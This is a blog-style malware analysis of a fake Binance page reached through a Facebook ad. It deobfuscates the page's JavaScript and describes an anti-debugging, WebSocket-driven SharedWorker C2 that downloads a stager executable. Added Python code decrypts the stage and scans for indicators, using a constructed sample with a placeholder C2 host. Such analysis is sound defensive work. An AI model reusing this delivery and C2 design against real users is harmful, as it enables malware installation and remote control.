Facebook malware in plain sight!
Ads are simply a premium Gophish for hackers.
The content on this blog is published for educational and informational purposes only. I am sharing my analysis and research to help others learn about cybersecurity threats and defensive techniques.
This story is going to be fun and I hope you enjoy it.
1. Initial access phase
It started when I was looking at my FB feed. I noticed an FB ad that was related to Binance.

I was bored, so I clicked on the FB ad. Eventually, my curiosity brought me to the following website.

At first, it looks normal, right? However, if you look closer at the domain name, you should notice that it is not https://binance.com!
If I try to access the URL from other browsers, I get a 404 Page Not Found page.

This is pretty interesting, so I decided to dig deeper. I looked at the HTML source page; nothing seems to raise a red flag here.

1.1 Defense evasion - Deobfuscate/Decode Files or Information techniques (T1140)
I usually like to read JS files, as those used to get me high-severity findings during pentest engagements. So I couldn't help myself but click on it.

Well, well, well. What do we have here? Isn't it supposed to be a JS file? It is quite common for JS to be minified, but not obfuscated. At that moment, my brain was fully awake and ready to track this down.
So I went to https://obf-io.deobfuscate.io/ to de-obfuscate this JS file.

Notice that this JS function uses .eval()!!! This is how APT38 and other crime organizations usually operate. They like to use .eval() to execute whatever arbitrary code is inside the JS file, in the browser.
Moreover, the real payload is encrypted with AES-CBC, using a key plus a hash-derived IV. We can use those to decrypt it and see what's inside.

I created a Python script to decrypt the content inside it using https://pypi.org/project/pycryptodome/ or you can use https://pypi.org/project/cryptography/.
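The decryption step described above, as an added example rather than the script from the post: it takes the key and the IV seed recovered from the deobfuscated JavaScript and returns the decrypted stage. The key/IV layout (hex key, IV = first 16 bytes of SHA-256 over a seed string) and the sample blob are constructed for this demo; the real values and derivation must be read out of the sample being analysed. It uses pycryptodome and falls back to the cryptography package, the two libraries named above.

```python
# Added example, not the blog's own script: decrypt the AES-CBC-encrypted
# second stage once the key and the IV seed have been pulled out of the
# deobfuscated JavaScript. The key/IV layout (hex key, IV = first 16 bytes
# of SHA-256 over a seed string) is an assumption for this demo; take the
# real values and derivation from the sample you are analysing.
import base64
import hashlib

try:
    # pycryptodome (https://pypi.org/project/pycryptodome/)
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad, unpad

    def _aes_cbc(key, iv, data, decrypt):
        cipher = AES.new(key, AES.MODE_CBC, iv)
        if decrypt:
            return unpad(cipher.decrypt(data), AES.block_size)
        return cipher.encrypt(pad(data, AES.block_size))

except ImportError:
    # fall back to cryptography (https://pypi.org/project/cryptography/)
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc(key, iv, data, decrypt):
        cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
        if decrypt:
            dec = cipher.decryptor()
            padded = dec.update(data) + dec.finalize()
            unpadder = padding.PKCS7(128).unpadder()
            return unpadder.update(padded) + unpadder.finalize()
        padder = padding.PKCS7(128).padder()
        padded = padder.update(data) + padder.finalize()
        enc = cipher.encryptor()
        return enc.update(padded) + enc.finalize()


def derive_iv(seed):
    """Assumed 'hash IV': the first 16 bytes of SHA-256 over the seed bytes."""
    return hashlib.sha256(seed).digest()[:16]


def decrypt_payload(key_hex, iv_seed, ciphertext_b64):
    """Return the decrypted stage as text. Raises ValueError on a bad key/IV
    (the PKCS#7 padding check fails) or if the result is not UTF-8."""
    key = bytes.fromhex(key_hex)
    if len(key) not in (16, 24, 32):
        raise ValueError("AES key must be 16, 24 or 32 bytes")
    iv = derive_iv(iv_seed.encode())
    plaintext = _aes_cbc(key, iv, base64.b64decode(ciphertext_b64), decrypt=True)
    return plaintext.decode("utf-8")


# Constructed sample standing in for the encrypted blob found in the script.
# The "stage" is a harmless marker string, not the real payload.
SAMPLE_KEY_HEX = hashlib.sha256(b"constructed-demo-key").hexdigest()  # 32-byte key
SAMPLE_IV_SEED = "constructed-iv-seed"
SAMPLE_STAGE = "eval(function(){/* obfuscated second stage would be here */}())"
SAMPLE_CIPHERTEXT_B64 = base64.b64encode(
    _aes_cbc(bytes.fromhex(SAMPLE_KEY_HEX), derive_iv(SAMPLE_IV_SEED.encode()),
             SAMPLE_STAGE.encode(), decrypt=False)
).decode()

if __name__ == "__main__":
    stage = decrypt_payload(SAMPLE_KEY_HEX, SAMPLE_IV_SEED, SAMPLE_CIPHERTEXT_B64)
    print(stage)
```

A wrong key or IV almost always surfaces as a padding error from `decrypt_payload`, which is the quickest sign that the derivation assumed here does not match the sample; in that case re-read how the script builds the IV from its hash before trying anything else.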

Let us see what's inside it.


Again it is obfuscated. We need to de-obfuscate it first (d@mn, these hackers aren't playing around. Kudos for that).

Payload analysis
An anti-debugging function is executed after the file is .eval()'d.


StreamSaver is used to turn installer.exe into a stream so the shared worker can download it.
They are using StreamSaver (https://github.com/jimmywarting/StreamSaver.js) to convert the installer executable into chunks. You can take a moment to read what StreamSaver is used for. IMO, they could just spin up an EC2 instance and host installer.exe there, but maybe StreamSaver is stealthier and more reliable? IDK.


Check that the victim is running Windows via the User-Agent.

Run a shared worker that takes commands and downloads installer.exe via StreamSaver, using the WebSocket (WS) protocol to connect back to the attacker's host.




Basically, the installer.exe (the one on the phishing website) is a decoy. It does not do anything except receive commands from the SharedWorker running in the background on the phishing website. This SharedWorker is the real C2 server. It orchestrates everything, from checking the victim's OS to downloading and installing the real malware file. It is quite stealthy because if you look at it, nothing looks suspicious: just 2 hosts trying to communicate with each other. So if you happen to install this malware, do not open this website. Problem solved. lol
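To turn the behaviours listed in this payload analysis into a quick triage check, here is an added example (not code from the post) that scans a deobfuscated stage for the same constructs: eval of decoded data, a devtools/anti-debugging check, an OS check on navigator.userAgent, a SharedWorker, a WebSocket channel and a StreamSaver write of an .exe. The regexes are heuristics written for this example, and the sample script and hostnames are constructed placeholders, not the real infrastructure.

```python
# Added example, not code from the blog: static triage of a deobfuscated stage
# for the behaviours described in the payload analysis. Patterns are heuristics
# written for this demo, not detection signatures for any specific sample.
import re

INDICATORS = {
    "eval of decoded data":     re.compile(r"\beval\s*\("),
    "anti-debugging":           re.compile(r"\bdebugger\b|outerWidth\s*-\s*(?:window\.)?innerWidth"),
    "OS check via User-Agent":  re.compile(r"navigator\.userAgent"),
    "SharedWorker":             re.compile(r"new\s+SharedWorker\s*\("),
    "WebSocket channel":        re.compile(r"new\s+WebSocket\s*\(\s*['\"](wss?://[^'\"]+)['\"]"),
    "StreamSaver exe download": re.compile(r"streamSaver\.createWriteStream\s*\(\s*['\"]([^'\"]+\.exe)['\"]", re.I),
}


def triage_script(script):
    """Map each matched indicator to the captured URL/filename, or True."""
    hits = {}
    for name, rx in INDICATORS.items():
        m = rx.search(script)
        if m:
            hits[name] = m.group(1) if m.groups() else True
    return hits


def risk_level(hits):
    """Rough score: worker + socket + exe download together is the C2 pattern."""
    c2_pattern = {"SharedWorker", "WebSocket channel", "StreamSaver exe download"}
    if c2_pattern <= set(hits):
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low"


def websocket_endpoints(script):
    """All ws:// and wss:// URLs in the script, for blocking or hunting."""
    return sorted(set(re.findall(r"['\"](wss?://[^'\"\s]+)['\"]", script)))


# Constructed sample mimicking the structure the post describes; the hostname
# is a placeholder (.invalid TLD), not the real infrastructure.
SAMPLE_STAGE2 = r"""
eval(atob(stage));
(function(){ if (window.outerWidth - window.innerWidth > 160) { debugger; } })();
if (!/Windows NT/.test(navigator.userAgent)) { throw new Error('unsupported'); }
var worker = new SharedWorker('/worker.js');
var ws = new WebSocket('wss://c2.example.invalid/socket');
var fileStream = streamSaver.createWriteStream('installer.exe', { size: 734003200 });
"""

# Constructed benign script for comparison.
SAMPLE_BENIGN = "document.getElementById('price').textContent = fetch('/api/ticker');"

if __name__ == "__main__":
    hits = triage_script(SAMPLE_STAGE2)
    for name, detail in hits.items():
        print(f"[{name}] {detail}")
    print("risk:", risk_level(hits), "| endpoints:", websocket_endpoints(SAMPLE_STAGE2))
```

Run it over the output of the deobfuscator rather than the raw file: on the obfuscated original, most of these names are hidden behind string-array lookups and nothing will match, which is exactly why the post deobfuscates first.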
Artifact Summary
1. JavaScript payload .eval(): anti-debugging; create a SharedWorker in the background that serves as a middle man between the victim's machine and the hacker's host; check the victim's OS via User-Agent; download installer.exe (real malware) via StreamSaver; use the WebSocket protocol for C2 operations; and eventually install the malware on the victim's machine.
2. Download an executable file (stager program) and run it!
3. Successfully implanted a stager malware with high privileges that is listening on 127.0.0.1:30000.
4. C2 connection established: the stager program is now reachable by a malicious SharedWorker that sends it commands!
P.S. If you want to know whether this SharedWorker is trying to send commands to the stager program on your Windows machine, inspect port 30000 while the phishing website is open, because they run the SharedWorker behind an iframe.

Lucky for me, I didn't install the stager program haha. Whatever is inside installer.exe is pretty dangerous. Think of it as a Cobalt Strike beacon, where the team server is the phishing website. I won't dig deeper into how that executable works since it requires a malware sandbox and the setup is a pain in the a$$. The executable is pretty large (700 MB), so we couldn't use any.run or other online sandboxes to fingerprint it.
How is it possible for the malware to run at system level?
Because when you install it, it requires administrative privileges for the installation, meaning you already gave them the privilege when you clicked the 'Yes' button in the UAC window.
